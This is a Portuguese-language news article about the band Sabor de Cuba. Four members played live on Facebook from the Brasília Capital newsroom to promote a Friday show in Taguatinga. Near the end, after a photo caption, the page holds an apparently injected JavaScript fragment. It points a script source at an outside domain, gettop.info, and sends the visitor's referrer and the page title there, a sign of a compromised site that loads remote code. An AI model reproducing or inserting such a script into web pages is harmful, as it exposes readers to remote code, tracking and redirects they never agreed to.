Banda Sabor de Cuba dá show em redação de jornal

sabor-de-cuba-1

Grupo apresenta-se para leitores do Brasília Capital, ao vivo, na página da publicação no Facebook.  

                                                               (Fotos: Antônio Sabino)

 

Quatro dos sete integrantes da banda Sabor de Cuba cantaram por, aproximadamente, uma hora em transmissão ao vivo pelo Facebook, na redação do jornal Brasília Capital, nesta quinta-feira (1º). Eles estão divulgando a apresentação do grupo nesta na noite desta sexta-feira (2), no Bar Kaixa D’água (Bar do Kareka), Praça da CNF (CNF 2, Lote 1, Lojas 4/5. Taguatinga, a partir das 22h.

Quem curte a página do Brasília Capital no Facebook pôde curtir a belíssima música dos cubanos que moram no Brasil e tem entre a turma um músico brasileiro, o baiano Ricardo Vieira. Espontâneos e extrovertidos, eles trouxeram a descontração em dia de fechamento da edição do jornal, que circula a partir de sábado (3).

sabor-de-cuba-3

Felix Valoy, Hector Lores, Ricardo Veira e Gumercindo Reis. Mas três artistas cubanos estarão com eles nesta sexta

A apresentação desta sexta-feira chama-se Noite Afro-cubana. Com Ricardo Vieira (maraca) estavam Felix Valoy (bongô), Hector Lores (voz e triângulo) e Gumercindo Reyes (instrumento de três cordas duplas, semelhante a um violão, chamado de três de Cuba). Eles deram uma mostra do que apresentarão em Taguatinga nesta sexta-feira. “Imagine no palco, com todos os membros, mais instrumentos”, brincou Ricardo Vieira.

 

sabor-de-cuba-2

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário